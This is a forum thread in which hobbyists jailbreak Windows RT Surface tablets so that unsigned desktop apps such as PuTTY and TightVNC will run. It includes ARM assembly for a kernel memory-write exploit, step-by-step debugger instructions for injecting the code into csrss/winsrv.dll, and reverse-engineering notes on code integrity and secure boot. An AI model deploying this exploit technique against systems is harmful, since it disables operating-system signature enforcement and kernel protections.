[Q] Hacking Windows RT to Run Desktop Apps?

[netham45]

cool !
Do you think that Microsoft can patch your exploit ?
You think we should stop Surface Update until you provide us a tool or something like that ?
I dont know if you foresee to do that
@+

They could, but since we can reinstall the OS from the recovery partition and there'll always be a copy of the unpatched recovery partition around we can revert any patches they throw out.

They could also ban MS accounts for doing this too, though I don't expect them to do that.

 

[mamaich]

Hmm, seems that there is already a working and very easy method that allows running unsigned apps on RT:
http://younsi.blogspot.ru/2012/10/notepad-for-windows-8-rt.html
Just create UMCIAuditMode=1 in "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CI" and reboot.

Can someone confirm that it works? As far as I see - this really should work, as this sets in ci.dll the g_CiOptions|=0x40, that later sets g_CiDeveloperMode=6, which should allow unsigned apps in dir specified in "HKLM\System\CurrentControlSet\Control\CI\TRSData" "TestPath" key (see this post: http://forum.xda-developers.com/showpost.php?p=33069395&postcount=10).

So all greetings for finding a working and easy "desktop-unlocking" method should go to Thomas Younsi

Edited:
As far as I see - this effectively turns on the "CI Audit" mode, that does not block unsigned apps from running, but just logs them. So adding a path to the "TestPath" should not be necessary.
And yes, this can be blocked by MS in later updates. But I really don't think that they would do that soon (or ever).

 

[clrokr]

@mamaich:
I can confirm that it doesn't work That would have been a nice way to do it though, very easy and scriptable.

 

[mamaich]

But strange - I've decompiled ci.dll from a device dump, and see that it checks those registry keys. But his is THUMB, so I may have mislooked something.

 

[netham45]

Nesting VNC windows is fun.

(Also, yes, I misspelled the name on my tablet.)


The main issue I had with recompiling, other than the libs, was the SxS manifests. I couldn't get them to work, so I just disabled them. Also, TightVNC has /machine:x86 set statically a few times in their configs, though that was easy enough to fix.


Also, here's PuTTY. I got fed up with winspool not working right so I just commented out all the calls to it, so printing may not (as in, won't) work right.

 

[rheza02]

i can't confirm it, none of your app works,

"windows cannot verify the digital signature ..."

 

[netham45]

i can't confirm it, none of your app works,

"windows cannot verify the digital signature ..."

Please read the past 3 or 4 pages of the thread. You have to do the exploit clrokr documented to get them to run.

Edit: Unless you were responding to mamaich, in which case ignore me.

 

[Dewinter]

Please read the past 3 or 4 pages of the thread. You have to do the exploit clrokr documented to get them to run.

Edit: Unless you were responding to mamaich, in which case ignore me.

1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source
3) armasm -o exploit.o exploit.asm
4) Taking the code starting at 0x64 (push r5) and putting it in Winsrv.dll!0x10800
5) Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)' (Note that there are two calls to NtUserSetInformationThread, I've tried putting the break right after both)
6) Placing a breakpoint at mov r0,r0 at Winsrv.dll!0x10800
7) Resuming CSRSS
8) Hitting vol down
9) Moving PC to Winsrv.dll!0x10800
10) Resume, at this point I BSoD.


3) when armasm , i always get errors like D:\arm.s(1) : error A2034: unknown opcode: {
push {r5-r8}

can you pls share your source code？i'm not familiar with the arm assembly

 

[lilstevie]

1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source
3) armasm -o exploit.o exploit.asm
4) Taking the code starting at 0x64 (push r5) and putting it in Winsrv.dll!0x10800
5) Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)' (Note that there are two calls to NtUserSetInformationThread, I've tried putting the break right after both)
6) Placing a breakpoint at mov r0,r0 at Winsrv.dll!0x10800
7) Resuming CSRSS
8) Hitting vol down
9) Moving PC to Winsrv.dll!0x10800
10) Resume, at this point I BSoD.


3) when armasm , i always get errors like D:\arm.s(1) : error A2034: unknown opcode: {
push {r5-r8}

can you pls share your source code？i'm not familiar with the arm assembly

You need to indent all opcodes.

 

[peterdn]

Also, here's PuTTY. I got fed up with winspool not working right so I just commented out all the calls to it, so printing may not (as in, won't) work right.

What problems did you have with winspool? Only issue I had (couldn't find it at runtime) was resolved by putting a copy of it named winspool.dll in PuTTY's working directory.

 

[netham45]

What problems did you have with winspool? Only issue I had (couldn't find it at runtime) was resolved by putting a copy of it named winspool.dll in PuTTY's working directory.

Pretty much that, I wanted it to be standalone.

 

[apatcas]

Utterly fantastic. Managed to compile PuTTY with not much trouble and it runs perfectly!

please please share this. I have looked high and low for something like putty but there's nothing but junk in the app store.

 

[netham45]

3) when armasm , i always get errors like D:\arm.s(1) : error A2034: unknown opcode: {
push {r5-r8}

can you pls share your source code？i'm not familiar with the arm assembly

	push {r5-r8}
	mov r7, 0x80000
	ldr r8, my_addr
loc_loop_begin
	movs r3, 0xC
	add r2, sp, 0x68 ;0x58 org.
	add r5, r2, 4
	str r8, [r5]
	movs r1, 9
	mvn r0, 1
	mov r12, 0x10E1
	svc 1
	subs r7, r7, 1
	cmp r7, 0
	bne loc_loop_begin
	pop {r5-r8}
	mov r0, r0
my_addr dcd 0x<Kernel Base + 0x19FFA4 + 0x18>
	end

Fix the my_addr line with yours.

please please share this. I have looked high and low for something like putty but there's nothing but junk in the app store.

I posted a build of putty a couple posts ago.

 

[rheza02]

Please read the past 3 or 4 pages of the thread. You have to do the exploit clrokr documented to get them to run.

Edit: Unless you were responding to mamaich, in which case ignore me.

Your discussion out of my league, i can't understand what you guys talking about. keep up the good work, thanks.

 

[mamaich]

I can confirm that it doesn't work That would have been a nice way to do it though, very easy and scriptable.

Now I see in the code - it calls ZwQuerySystemInformation(143,...) and checks those flags only if it returns error 0x80430006 (not implemented?) or returns success and some bit in result is set to 1 (probably that bit shows that we are using a "development device"). Or if kernel debugger is active. So no luck here. At least until we'll find the implementation of that ZwQuerySystemInformation(143) and force it to return error.

Damn thumb, x86/x64 is much simpler

Updated: 143 == SeSecureBootQueryInformation. Just to be indexed by google.
maybe switching off secure boot policy, as i've posted earlier, would help?

 

[Dewinter]

	push {r5-r8}
	mov r7, 0x80000
	ldr r8, my_addr
loc_loop_begin
	movs r3, 0xC
	add r2, sp, 0x68 ;0x58 org.
	add r5, r2, 4
	str r8, [r5]
	movs r1, 9
	mvn r0, 1
	mov r12, 0x10E1
	svc 1
	subs r7, r7, 1
	cmp r7, 0
	bne loc_loop_begin
	pop {r5-r8}
	mov r0, r0
my_addr dcd 0x<Kernel Base + 0x19FFA4 + 0x18>
	end

Fix the my_addr line with yours.




I posted a build of putty a couple posts ago.

thanks , it works

 

[clrokr]

Now I see in the code - it calls ZwQuerySystemInformation(143,...) and checks those flags only if it returns error 0x80430006 (not implemented?) or returns success and some bit in result is set to 1 (probably that bit shows that we are using a "development device"). Or if kernel debugger is active. So no luck here. At least until we'll find the implementation of that ZwQuerySystemInformation(143) and force it to return error.

Damn thumb, x86/x64 is much simpler

ZwQuerySystemInformation(143,...) leads to SeSecureBootQueryInformation...

 

[windowsrtc]

Whats wrong with my steps?Please help
here is my step.I need help for my step6 .
1.get my_addr dcd
View attachment 1624951
my_addr dcd:0x8341d000+0x19ffa4+0x18=0x835bcfbc

2.change my_addr dcd in exploit.asm and compile it
loc_loop_begin
movs r3, 0xC
add r2, sp, 0x68 ;0x58 org.
add r5, r2, 4
str r8, [r5]
movs r1, 9
mvn r0, 1
mov r12, 0x10E1
svc 1
subs r7, r7, 1
cmp r7, 0
bne loc_loop_begin
pop {r5-r8}
mov r0, r0
my_addr dcd 0x0x835bcfbc
end

3.attach csrss.exe


4.find winsrv.dll base 0x74f00000


5.put code to 0x74f00000+0x10800=0x74f10800


6. "Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)"
here is my question.I cant find bl NtUserSetInformationThread (75475134h)//How Can I find this address?
and I dont find these code:
TerminalServerRequestThread+0x230//How Can I find this address?
MOVS R3, #0xC
ADD R2, SP, #0x58
MOVS R1, #9
MOV R0, 0xFFFFFFFE
BL NtUserSetInfomationThread

so I find something like that:

and I set breakpoint at 0x74f03640

7.after press volume down,csrss.exe break at 0x74f03640 and I chang PC to 0x74f10800


8.press F11 and set breakpoint at 0x74f1082e


9.after resume I got BSoD

my step 6 mybe incorrect,so plesae help

btw Im using a Chinese version surface

 

[peterdn]

6. "Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)"
here is my question.I cant find bl NtUserSetInformationThread (75475134h)//How Can I find this address?
and I dont find these code:
TerminalServerRequestThread+0x230//How Can I find this address?
MOVS R3, #0xC
ADD R2, SP, #0x58
MOVS R1, #9
MOV R0, 0xFFFFFFFE
BL NtUserSetInfomationThread

The call to NtUserSetInformationThread that you want is at +0x365e from the base address, if I remember correctly. From your screenshot I see you are at +0x3640 from base, so, just scroll down a little and set your breakpoint immediately after the bl instruction.

 

[netham45]

Make sure that you have symbols loading properly too, I had to go into options and enable the MS Symbol Server before I could get it to load symbols for me. Then you'll be able to find the function.

Also,

No networking, since that relies on winpcap, but everything else seems to be working well enough.